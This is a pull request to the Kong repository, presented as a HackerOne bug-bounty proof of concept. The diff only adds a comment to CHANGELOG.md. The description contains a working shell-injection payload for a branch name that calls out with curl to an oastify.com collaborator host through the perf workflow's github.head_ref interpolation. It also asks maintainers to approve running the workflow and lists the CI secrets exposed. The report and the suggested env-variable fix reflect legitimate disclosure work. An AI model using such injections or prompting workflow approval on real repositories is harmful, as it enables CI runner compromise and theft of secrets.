### PR TITLE
perf(test): Bug Bounty PoC — Shell Injection via github.head_ref (HackerOne)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -3363,3 +3363,5 @@ Please see [CHANGELOG-OLD.md](CHANGELOG-OLD.md) file for < 3.0 releases.
 [3.1.0]: https://github.com/Kong/kong/compare/3.0.1...3.1.0
 [3.0.1]: https://github.com/Kong/kong/compare/3.0.0...3.0.1
 [3.0.0]: https://github.com/Kong/kong/compare/2.8.1...3.0.0
+
+<!-- HackerOne BBP PoC — non-destructive shell-injection demonstration for .github/workflows/perf.yml @ github.head_ref interpolation. Reporter: wallacecampanha. Will be closed promptly. -->


### PR DESCRIPTION
Hi Kong security team,

This PR is a **bug-bounty proof-of-concept** for HackerOne — demonstrating a shell-injection vulnerability in `.github/workflows/perf.yml:179` via the `${{ github.head_ref }}` interpolation inside a bash `run:` block.

## Details
- **File**: `.github/workflows/perf.yml`, line 179
- **Vulnerable line**: `vers="git:${{ github.head_ref }},git:${pr_ref}"`
- **Branch (head_ref) payload**: `$(curl${IFS}-s${IFS}t93lctl7frzgp8fpwmvtgbx7qywsksc2qfwu0b50.oastify.com/headref)`

When the `perf` workflow's `compare_versions` step expands `${{ github.head_ref }}` directly into bash, the branch name's `$(curl ...)` command-substitution will execute, producing a DNS+HTTP callback to a Burp Collaborator endpoint.

## Safety / Ethics
- **No destructive commands**, **no secret exfiltration** in the actual payload.
- The Collaborator endpoint logs only the connection (DNS + HTTP request).
- A successful callback proves that **arbitrary commands could run** in the GHA runner with access to `secrets.PAT`, `secrets.PERF_TEST_BYO_*`, and any tokens the perf job sees — i.e. this is **HIGH/CRITICAL** severity.

## Recommended fix
Move `github.head_ref` to a step-level `env:` variable and reference it as `$HEAD_REF` inside the bash block (same pattern already used for `PR_BASE_REF` two lines above).

## Action
Please feel free to close this PR — I will close it myself once I see the callback (or after 24 h with no maintainer approval). The first-time-contributor gate means a maintainer must click "Approve and run workflow" — that approval is **only needed for this validation**; the vuln itself does not require it on subsequent PRs from the same author.

**Reference**: BBP-2026-kong-perf-yml-injection — reporter wallacecampanha (HackerOne).

Thanks for running an open bounty program!